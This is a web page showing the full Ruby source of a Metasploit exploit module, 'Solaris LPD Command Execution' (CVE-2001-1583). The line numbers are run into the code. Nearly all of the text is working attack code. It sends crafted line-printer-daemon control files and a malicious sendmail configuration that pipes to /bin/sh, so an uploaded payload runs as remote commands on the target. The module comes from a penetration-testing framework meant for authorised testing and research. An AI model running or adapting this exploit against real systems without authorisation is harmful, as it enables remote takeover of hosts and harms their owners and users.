Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/solaris/lpd/sendmail_exec.rb
Views: 11783
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(update_info(info,12'Name' => 'Solaris LPD Command Execution',13'Description' => %q{14This module exploits an arbitrary command execution flaw in15the in.lpd service shipped with all versions of Sun Solaris16up to and including 8.0. This module uses a technique17discovered by Dino Dai Zovi to exploit the flaw without18needing to know the resolved name of the attacking system.19},20'Author' => [ 'hdm', 'ddz' ],21'License' => MSF_LICENSE,22'References' =>23[24[ 'CVE', '2001-1583'],25[ 'OSVDB', '15131'],26[ 'BID', '3274'],27],28'Platform' => %w{ solaris unix },29'Arch' => ARCH_CMD,30'Payload' =>31{32'Space' => 8192,33'DisableNops' => true,34'Compat' =>35{36'PayloadType' => 'cmd',37'RequiredCmd' => 'generic perl telnet',38}39},40'Targets' =>41[42[ 'Automatic Target', { }]43],44'DisclosureDate' => '2001-08-31',45'DefaultTarget' => 0))4647register_options(48[49Opt::RPORT(515)50])51end5253def exploit5455# This is the temporary path created in the spool directory56spath = "/var/spool/print"5758# The job ID is squashed down to three decimal digits59jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]6061# The control file62control =63"H"+"metasploit\n"+64"P"+"\\\"-C"+spath+"/"+jid+"mail.cf\\\" nobody\n"+65"f"+"dfA"+jid+"config\n"+66"f"+"dfA"+jid+"script\n"676869# The mail configuration file70mailcf =71"V8\n"+72"\n"+73"Ou0\n"+74"Og0\n"+75"OL0\n"+76"Oeq\n"+77"OQX/tmp\n"+78"\n"+79"FX|/bin/sh #{spath}/#{jid}script\n"+80"\n"+81"S3\n"+82"S0\n"+83"R\+ #local \\@blah :blah\n"+84"S1\n"+85"S2\n"+86"S4\n"+87"S5\n"+88"\n"+89"Mlocal P=/bin/sh, J=S, S=0, R=0, A=sh #{spath}/#{jid}script\n"+90"Mprog P=/bin/sh, J=S, S=0, R=0, A=sh #{spath}/#{jid}script\n"9192# Establish the first connection to the server93sock1 = connect(false)9495# Request a cascaded job96sock1.put("\x02metasploit:framework\n")97res = sock1.get_once98if (not res)99print_status("The target did not accept our job request command")100return101end102103print_status("Configuring the spool directory...")104if !(105send_file(sock1, 2, "cfA" + jid + "metasploit", control) and106send_file(sock1, 3, jid + "mail.cf", mailcf) and107send_file(sock1, 3, jid + "script", payload.encoded)108)109sock1.close110return111end112113# Establish the second connection to the server114sock2 = connect(false)115116# Request another cascaded job117sock2.put("\x02localhost:metasploit\n")118res = sock2.get_once119if (not res)120print_status("The target did not accept our second job request command")121return122end123124print_status("Attempting to trigger the vulnerable call to the mail program...")125if !(126send_file(sock2, 2, "cfA" + jid + "metasploit", control) and127send_file(sock2, 3, "dfa" + jid + "config", mailcf)128)129sock1.close130sock2.close131return132end133134sock1.close135sock2.close136137print_status("Waiting up to 60 seconds for the payload to execute...")138select(nil,nil,nil,60)139140handler141end142143def send_file(s, type, name, data='')144145s.put(type.chr + data.length.to_s + " " + name + "\n")146res = s.get_once(1)147if !(res and res[0,1] == "\x00")148print_status("The target did not accept our control file command (#{name})")149return150end151152s.put(data)153s.put("\x00")154res = s.get_once(1)155if !(res and res[0,1] == "\x00")156print_status("The target did not accept our control file data (#{name})")157return158end159160print_status(sprintf(" Uploaded %.4d bytes >> #{name}", data.length))161return true162end163end164165166